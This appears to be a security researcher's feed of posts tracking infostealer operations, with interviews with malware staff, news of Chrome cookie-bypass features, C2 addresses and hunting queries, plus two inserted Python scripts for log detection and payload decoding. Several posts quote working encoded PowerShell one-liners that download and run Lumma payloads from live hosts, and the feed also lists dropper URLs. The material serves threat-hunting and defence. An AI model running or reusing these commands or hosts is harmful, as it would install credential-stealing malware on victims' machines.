He who does what he can is not obliged to do more | donate to g0njxa.eth | Bad student, enthusiast, defo not an expert
DMs are open, feel free to reach out!
In the past weeks I interviewed the staff of the major infostealer projects, a total of 7: Lumma, Raccoon, Meduza, Vidar, Amadey, StealC, Meta.
Below you will find a short summary of this series, which ends today, and also the ones who refused to talk.
Google Chrome implemented an update that caused a major outage in cookie collection by infostealers, and users are experiencing several issues.
Vidar talks about the usage of "a TPM module for encryption".
Vidar, Lumma and StealC are already working on this issue to fix it.
I mean... Don't let your archive be exposed to the public.
#opendir http://77.91.68.78/lend/
Redline, Lumma, Warzone RAT, Meduza Stealer, PovertyStealer, Formbook, Raccoon, AsyncRAT, Rhadamanthys, Smoke Loader, WhiteSnake & a miner on hashvault
#Remcos RAT being delivered as a fake CrowdStrike hotfix, targeting @bbva bank, from: /portalintranetgrupobbva.com
Delivered via Dropbox
C2: 213.5.130.58:443
Detonation:
Slight changes on this #Lumma campaign, new frontend and payload design:
powershell -W Hidden -eC aQBlAHgAIAAoAGkAdwByACAAaAB0AHQAcABzADoALwAvAHkAaQBwAC4AcwB1AC8AMgA1AHkAWAA5ADQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACkALgBDAG8AbgB0AGUAbgB0AA==
Watch for malicious traffic on shady websites, don't paste anything on your PC
#Lumma Stealer
powershell.exe -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAGwAZQBuAGcAbwAtADIAMABjAGIANAAuAGsAeABjAGQAbgAuAGMAbwBtAC8AawBqAGQAZgBoAGUAdwBlAA==
Detonation:
The #Meduza stealer has been banned from the XSS forum after being accused of infecting Russian individuals and failing to protect these users from being infected by the stealer.
Same issues as Rhadamanthys a few weeks ago.
#Meduza Stealer is not dead!
Search for C2 panels on @fofabot:
icon_hash="-559608920"
Some new panels:
193.233.133.81
146.70.161.13
77.105.147.136
185.106.94.31
212.113.116.56
89.185.85.132
95.181.173.235
95.181.173.8
95.181.173.233
89.185.85.34
#Raccoon Stealer has been observed using a new User-Agent: GunnaWunnaBlueTips, since at least 05-13
hxxps://telegra.ph/WareHacks-Soft-04-22
C2: #RacconV2 #Recordbreaker
37.220.87.66
45.9.74.99
UA: GunnaWunnaBlueTips
@crep1x
reCAPTCHA malware campaign is now abusing @Vultr S3 buckets and CDN to deliver #Lumma Stealer
Detonation:
Also loading another unidentified binary from /onefreex.com/api/download that only downloads with a custom User-Agent:
FYI, an actual updated #Lumma Stealer panel: /oldlumma.fun/login @ViriBack
Also the actual Lumma API domain: /funlumma.fun (updated on August 17th from /apilumma1.fun)
Quick changes on this reCAPTCHA malware campaign, now abusing @digitalocean S3 buckets and CDN to still deliver #Lumma Stealer.
Similar behavior, Detonation:
#Lumar stealer (not Lumma!), also known and tracked as #PovertyStealer (), is one of the next infostealers to implement a bypass of the new Google Chrome v128 cookie encryption.
With some disadvantage: the build needs administrator rights
Let's follow with more macOS malware
A brief interview with Ping3r aka Atomic macOS Stealer (AMOS). The infamous original, the alleged first one.
Exclusive content on #defcon32 days, because why not.
Take a break, take a read!
Anonfiles, one of the major free file storage providers of the past years, has announced the end of its service and its domain is now for sale
@vxunderground
RIP anonfiles :(
#MeduzaStealer is pushing out the bypass method in the test version to get cookies from Chrome 127. The pricing is still the same.
Translation:
Some stealer users encountered Chrome update 127, which changed the encryption for cookies by executing the process in a separate
The infamous #Vidar Stealer also announced today an update featuring its own bypass of the newest Google Chrome app-bound cookie encryption (without admin privileges)
This announcement follows those of the infostealers Meduza, Lumma and Lumar
Full statement
The infamous #Rhadamanthys Stealer has been banned from the XSS forum after failing to provide protection for people in CIS countries.
Rhadamanthys was used against Russian military infrastructure (), also by some fellow traffers guys...
#WhiteSnake Stealer has recently announced an update featuring the creation of malicious .SLN (Visual Studio Solution) files as downloaders from a remote host in order to serve malware
Full changelog statement below:
The infamous #META Stealer becomes the next infostealer to claim the collection of cookies from the most updated version of the Google Chrome browser (v129)
After Lumma, Lumar, Meduza, Vidar, StealC, Rhadamanthys, WhiteSnake... Who is missing?
Full statement
I recently made an interview with #Lumma Stealer staff.
Just a brief talk :)
They want to say hello to all of us. The malware project is near its 1st anniversary, it's time to dive into Lumma
Read it at:
I made a little interview with #Meduza Stealer staff.
The "Immaculate" stealer and heir to Aurora's (RIP) legacy shared a little time talking about his product.
Take a look at:
You can also track the latest #Qakbot C2 servers with @fofabot:
jarm="21d14d00021d21d21c42d43d0000007abc6200da92c2a1b69c0a56366cbe21" && header_hash="480868286"
You may still have some curiosity about how macOS infostealers were born and the history behind this kind of malware.
After the long months they have existed there were still some stories to tell, so be cautious with your own judgements!
Feel free to take a read:
The new exfiltration method used by #Lumma Stealer would be POST requests to a new endpoint on C2 servers
Let's say goodbye to /c2sock & /c2conf (RIP)
New endpoint: /api
act=recive_message (Configuration request)
act=send_message (Exfiltration)
@AnFam17 @evstykas
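The two network indicators above (the GunnaWunnaBlueTips User-Agent from the Raccoon post and the new Lumma /api endpoint with its act= values, plus the retired /c2sock and /c2conf paths) are easy to turn into a proxy-log check. The script below is an added example, not code from the original posts or from any of the malware projects; the log format is a constructed one-line-per-request layout and the IPs in the sample are RFC 5737 documentation addresses, so nothing here is real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Indicators taken from the posts above
RACCOON_UA = "GunnaWunnaBlueTips"
LUMMA_ACTS = {"recive_message": "configuration request", "send_message": "exfiltration"}
LUMMA_LEGACY_PATHS = {"/c2sock", "/c2conf"}

# Constructed proxy log (not real traffic): METHOD URL STATUS "USER-AGENT" [| POST body]
SAMPLE_LOG = """\
POST http://198.51.100.10/api 200 "Mozilla/5.0" | act=recive_message&ver=4.0
POST http://198.51.100.10/api 200 "Mozilla/5.0" | act=send_message&lid=abc123
GET http://203.0.113.5/index.php 200 "GunnaWunnaBlueTips"
POST http://192.0.2.7/c2sock 200 "Mozilla/5.0"
GET http://example.com/api 200 "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3}) "(?P<ua>[^"]*)"'
    r'(?: \| (?P<body>.*))?$'
)


def parse_line(line):
    """Split one constructed log line into its fields; None if it does not fit the layout."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def classify(rec):
    """Return (tag, detail) findings for a single parsed request."""
    findings = []
    if rec["ua"] == RACCOON_UA:
        findings.append(("raccoon_v2_user_agent", rec["ua"]))
    path = urlsplit(rec["url"]).path
    if rec["method"] == "POST" and path == "/api" and rec["body"]:
        # Lumma's new scheme: POST /api with act=recive_message or act=send_message
        act = parse_qs(rec["body"]).get("act", [None])[0]
        if act in LUMMA_ACTS:
            findings.append(("lumma_api_" + act, LUMMA_ACTS[act]))
    if path in LUMMA_LEGACY_PATHS:
        findings.append(("lumma_legacy_path", path))
    return findings


def scan(log_text):
    """Run every parseable line through classify(); returns (url, tag, detail) hits."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            for tag, detail in classify(rec):
                hits.append((rec["url"], tag, detail))
    return hits


if __name__ == "__main__":
    for url, tag, detail in scan(SAMPLE_LOG):
        print(f"{tag:28} {url:40} {detail}")
```

A plain GET to a path named /api without an act= parameter deliberately produces no hit (last sample line): the path alone is far too common to alert on, so the check keys on the POST body.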
#Lumma Stealer has just been updated
Featuring the partnership with "GhostSocks", a SOCKS5 manager.
So it seems like Lumma Stealer will now be leveraging SOCKS5 proxies on victims.
I don't know how this works but I believe it's something like other proxy malware (#SystemBC)
Hunting for #ClearFake / #ClickFix with @fofabot
Malicious script seen in the wild leveraging the "EtherHiding" technique using ETH address ()
We can search for domains infected by this campaign using this address
Hunt query:
Proofpoint threat researchers have noticed that a clever #socialengineering tactic is becoming increasingly popular amongst threat actors.
The campaign tricks end users into copying and pasting malicious PowerShell scripts, ultimately installing malware.
#Lumma Stealer has now opened a "Log Market" where Lumma operators (with a storefront code) can sell their own logs directly from their panel.
Purchases are made through crypto deposits to BTC or ETH addresses. Currently there are ~5700 logs for sale from unknown vendors
Threat actors are abusing @teamguilded CDN to deliver #AsyncRAT via malicious Visual Studio Code projects on compromised GitHub accounts disguised as fake game cheats and fake Discord infostealers
cc / @SquiblydooBlog @Cipher0091
Detonation:
Thread
Operators behind this #lumma campaign also dropped an XMR miner
Detonation:
After reporting to the pool, the worker was disconnected, with an amazing reward (not paid) of 0.00079836 XMR ($0.14) generated between 09/18 21:00 and 09/19 13:00 UTC
Profit
Crazy Thursday.
- Dr. Web, the Russian antivirus company, disclosed a breach. Dr. Web stopped sending antivirus updates September 16th. Subsequently, Dr. Web reportedly disconnected their servers from their internal network while they investigated the suspected compromise. Dr.
#Lumma Stealer implemented a bot protection system, "pre-trained on screenshots of known virtual machines", 2 months ago.
They now claim to have detected 483k bots, avoiding 68k "garbage logs", reducing usage of HDDs and helping the world to become cleaner with less CO2 emissions
CryptoGrab, a crypto drainer service, was granted a stand at MAC Yerevan 2024, where "staff and top members" met with the people at the conference, sharing merch and some drinks
First spotted by @0xneosec
All photos:
I made an interview with #StealC stealer owner.
We talked about his malware project, and he "wishes us good luck" in our hunting.
Please read it at:
Seems like now #infostealers found a way to collect valuable information from Mozilla-based browser extensions.
These are new features on some known stealers, first reported by #Lumma Stealer in mid April and followed, for example, by #ACR Stealer and #Vidar at the moment
I made an interview with #Vidar staff.
The infamous Vidar stealer (at its 5th anniversary) and I had a little talk about his malware project.
They say that "there is no need to hold a grudge against us"...
Read it at:
Google Chrome browser v129 was released on September 17th, 2024, and one of the "new" features that caught infostealer devs' attention is the storage of CVC codes from credit cards
#WhiteSnake updated recently featuring the grabbing of this information from victims' browsers.
I made an interview with #Recordbreaker Stealer staff.
Not many questions, just asking things about Raccoon Stealer.
Will "MrBidenNeverKnow" be the next User-Agent that we will find on this stealer?
Take a look at:
If you didn't notice, some websites involved with #ClearFake #FakeUpdates campaigns seem to be sending download records to a Telegram bot, forwarded to a group.
46.255.201.42 - CN authenticprod[.]fr
styktraffred - Group name
applemalicalo_bot - Bot user
#PrivateLoader now serves its builds from an FTP server.
1 - download a .zip from a compromised host (/institutodeseguros.com.pe)
2 - Zip contains a .lnk that retrieves the PrivateLoader build .zip from FTP server 147.45.47.80
3 - AutoIt loader
Just came across a weird #malware campaign being spread on X via malicious ads (help!)
TL showed me this ad /Andristo_88/status/1776305295263756467 which is aiming at /audacityteam.top (suspended).
Find it at archive showing the website and
PrivateLoader Rewind 2023
+1 million unique installs in 2023
A humble blog about the InstallsKey PPI service. Profiling customers, the sources of their installations and the service itself!
Also available at /t.me/privateloader (EN & RU)
While the #lockbit disruption is deservedly getting all the attention,
it seems like other ransomware gangs are having issues, talking about #Stormous ransomware
Stormous #DOWN
CHAOS is an open-source RAT (/github.com/tiagorlampert/CHAOS) that was somewhat popular and abused last year, and it's still in use!
Track this on @fofabot:
fid="9BUak7FRNMoqKoJPH7v8Lw=="
US, Canada, UK and Australia websites are compromised to serve Fortnite spam (again)
At first, the TA seems to be abusing Kentico CMS media libraries.
Compromised websites include Bing Blogs, credit unions, medical institutions and NGOs
See full list!
hxxp://77.91.78.118/test2.bat
Cute privilege escalation method dropped by #Amadey Loader
It also disables any restore point on the infected host and blocks downloads from browsers.
Ironhost IO - BulletProof Servers joined the PrivateLoader campaign, serving as a C2 since 1st November.
91.92.243.151 - ironhost[.]io
Need a fast and reliable bulletproof server? Do not wait!
just released Safebrowsing, a new service that lets you quickly explore URLs in an isolated virtual browser
It notifies you about threats and has a friendly interface, perfect for users with any expertise level
Give it a try, it's free
A new one, still delivering #Lumma Stealer
powershell.exe -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAHYAZQByAGkAZgAuAGQAbAB2AGkAZABlAG8AcwBmAHIAZQAuAGMAbABpAGMAawAvADIAbgBkAGgAcwBvAHIAdQA=
Detonation:
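The ClickFix one-liners quoted in this thread (the "powershell -eC ..." commands above and the earlier ones with the yip.su and kxcdn.com payloads) all use PowerShell's -EncodedCommand switch, which takes base64 of a UTF-16LE string. The decoder below is an added example, not the author's tooling or anything from the Lumma project: it pulls the -eC argument out of a command line, decodes it, defangs the URLs it finds and flags the download/execute helpers (mshta, iwr, iex) so the pasted command can be triaged without running it. The three SAMPLES are the encoded strings copied from the posts; the hidden-window check and the LOLBIN list are this example's own choices.

```python
import base64
import re

# Encoded command lines copied from the posts above (treat the decoded URLs as malicious)
SAMPLES = [
    "powershell -W Hidden -eC aQBlAHgAIAAoAGkAdwByACAAaAB0AHQAcABzADoALwAvAHkAaQBwAC4AcwB1AC8AMgA1AHkAWAA5ADQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACkALgBDAG8AbgB0AGUAbgB0AA==",
    "powershell.exe -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAGwAZQBuAGcAbwAtADIAMABjAGIANAAuAGsAeABjAGQAbgAuAGMAbwBtAC8AawBqAGQAZgBoAGUAdwBlAA==",
    "powershell.exe -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAHYAZQByAGkAZgAuAGQAbAB2AGkAZABlAG8AcwBmAHIAZQAuAGMAbABpAGMAawAvADIAbgBkAGgAcwBvAHIAdQA=",
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
ENC_FLAG_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\")]+", re.IGNORECASE)
# Download/execute helpers worth calling out in a pasted one-liner (example's own list)
LOLBINS = ("mshta", "iwr", "invoke-webrequest", "iex", "invoke-expression",
           "curl", "wget", "bitsadmin", "certutil")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if the flag is absent."""
    m = ENC_FLAG_RE.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)          # tolerate stripped base64 padding
    return base64.b64decode(blob).decode("utf-16-le")


def defang(url):
    """hxxp and bracketed dots so the URL cannot be clicked by accident."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def triage(cmdline):
    """Decode one command line and summarise what it would do."""
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        return None
    lowered = decoded.lower()
    return {
        "decoded": decoded,
        "urls": [defang(u) for u in URL_RE.findall(decoded)],
        "lolbins": [b for b in LOLBINS if re.search(r"\b" + re.escape(b) + r"\b", lowered)],
        "hidden_window": bool(re.search(r"-w(?:indowstyle)?\s+hidden", cmdline, re.IGNORECASE)),
    }


if __name__ == "__main__":
    for sample in SAMPLES:
        print(triage(sample))
```

Decoding rather than executing is the whole point: the decoded text is all an analyst needs to pull the second-stage URL, and the defanged form is what goes into a report or a blocklist.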
Have you ever wondered what is going on with Vietnamese malware targeting Facebook accounts?
I did, so you can get a quick overview of these threat actors' activities and how they are spending (and earning) millions of $$$
Read now!
#dropshipping
Today, my PC was nearly compromised.
With just one click, I installed a malicious @code extension. Luckily, I was saved as my PC doesn't run on Windows.
Hackers are getting smarter and aren't just targeting beginners. Here's how they do it and how you can protect your coins!
Android botnets ain't dead!
#Ermac V3.0 Botnet C2 Panel
91.215.85.213
Didn't find any information on this new version of this botnet. The previous V2 had a leak in March 2023
This was a previous C2 for StealC
@0x6rss want to take a look? :)
A few days ago, #Amadey owner and I did a brief interview.
We talked about the past, present and future of the infamous #Amadey Loader, one of the biggest products in the MaaS environment. Something worth a read.
Please find it at:
#Lumma Stealer updated its capabilities recently.
It now has the ability to load other files while executing the main stealer, and self-deletion after that
This behavior is common on other stealers like #Vidar or #recordbreaker, loading crypto clippers like #laplas.
Very active.
InCrease, developer of #Amadey loader, has decided to share with me some exclusive footage of the upcoming v5 Amadey panel with the new "features, stats and FAQ".
These are currently available to a few Amadey beta-testers; release is scheduled for the 6th anniversary in October 2024.
Let's discover one of the "youngest" infostealer traffer teams playing bad around...
Ghostbusters aka MMM Team
+70k victims recorded in less than a year with +100 members disclosed, still active
Absolute customization of builds and more!!
An unknown #stealer has been spotted on YT!
C2: http://146.71.81.144/
Cookie stealer, file grabber, crypto wallets, password managers and screenshots, everything POSTed to C2
Take a look! Just uploaded to VT
#StealC stealer has recently released an update (v1.9.2) featuring an "offline" version (without requests to C2, the log is stored on the victim) and also a DLL version allegedly copied from #Vidar Stealer
These features allow StealC to be used as an enumeration / discovery tool
@LinkedIn accounts are compromised on a daily basis to join a big SEO poisoning campaign via LinkedIn Pulse.
Users are then redirected to fake malicious sites where malware is being distributed, mainly #Lumma Stealer, #Cryptbot and #AMOS for Mac users (finally found!)
More live #Clearfake!
This is not about RU, this is China!
Search on @fofabot
title="Google Chrome 网络浏览器"
Examples:
/www.updateload.live/
/ggsdown.top
/update.chrome-up.com/
/y13xlt1d.xyz/
/url.drvceo.com
/kcdq78.fit
Check samples!
#Meta Stealer just got updated to v4.3
So it seems like malware developers are now using AI to sign builds in order to avoid detection?
@NexusFuzzy
I believe the same updates will be seen on Redline soon, as usual.
Check everything
Watch out for Dynamics 365 *.microsoftcrmportals domains, abused in the "free vbucks" SEO poisoning campaign
/osvolunteers.microsoftcrmportals.com
/fms.microsoftcrmportals.com
/indspire.microsoftcrmportals.com
/ecosoft.microsoftcrmportals.com
/bggtscsp.microsoftcrmportals.com
hxxp://bratzen.duckdns.org/byte/
#Opendir
Unknown #loader hosting unknown payloads as a commercial loader for malware distribution.
Stored as .txt with the client's TG username.
Seen on #PrivateLoader campaigns
The infamous Raccoon stealer has not been updated for long months and the activity in the wild has dropped (talking about me, I see no more Raccoon)
Asked his staff; seems like the old coder left and there's a new one working on it, so we must expect new updates soon!
macOS malware has been a trend in the past months... They are a threat that can be found in the wild pretty easily
So why not release some interviews with macOS infostealers?
Today, a brief talk with Poseidon Stealer dev aka Rodrigo
Hunting #Clearfake with @fofabot
fid="QddxtK34KUI1XP5ujfy5bw=="
Track the latest compromised domains
/altenara.com
/doolittles.be
/easymall.co.th
/megacarwreckers.com.au
/filmovita.ba
/staging.armipour.com
/or-and.com
/esmito.com
/sistemajogodobicho.com
There should be more!
#Rhadamanthys kept their word and released new versions (v0.7), keeping the malware project alive
New API interface, frameworks rewritten and usage of AI for (mnemonic) phrase extraction?
Full statement below!
The #Rhadamanthys Stealer project is not dead (after being banned from the XSS and Exploit forums)
Its owner is now featuring a "new beginning", with future releases of new versions.
Something crazy is now being pushed by #Privateloader: it opens a pop-up window with a Microsoft error and a QR code.
/pcrrent.com (Microsoft phishing) CN??
Financial information is asked for and exfiltrated via POST to /pcrrent.com/index.php
Full Detonation:
Somebody found a TG bot API hash from Snake Keylogger (like me) and decided to share free malware in all chats
A stealer with no detections, what is it?
C2: http://128.199.113.162/XtfcshEgt/upwawsfrg.php
Panel: 128.199.113.162
@ViriBack
Detonation:
#META stealer v5.0 is actually released after the previous announcement.
Featuring TLS encryption between build and C2 panel (as seen in other stealers like Lumma or Vidar in recent updates), among other new and fancy features.
Check everything
#META stealer recently announced an incoming update on June 17th featuring a "new, unique and individual system"
Current version is v4.6 from May 23rd
Let's see what they prepare...
The use of SSL certificates in #stealers communication with C2 servers is becoming popular among these malware projects.
Exfiltration over HTTPS allegedly makes them "receive fewer detections on C2s and prolong their life"
A recent example is #Lumma Stealer
CrowdStrike outage is fake, there is no incident!!!!
We hacked into a company using CrowdStrike and everything was good, stop spreading disinformation in the media you liars!!!!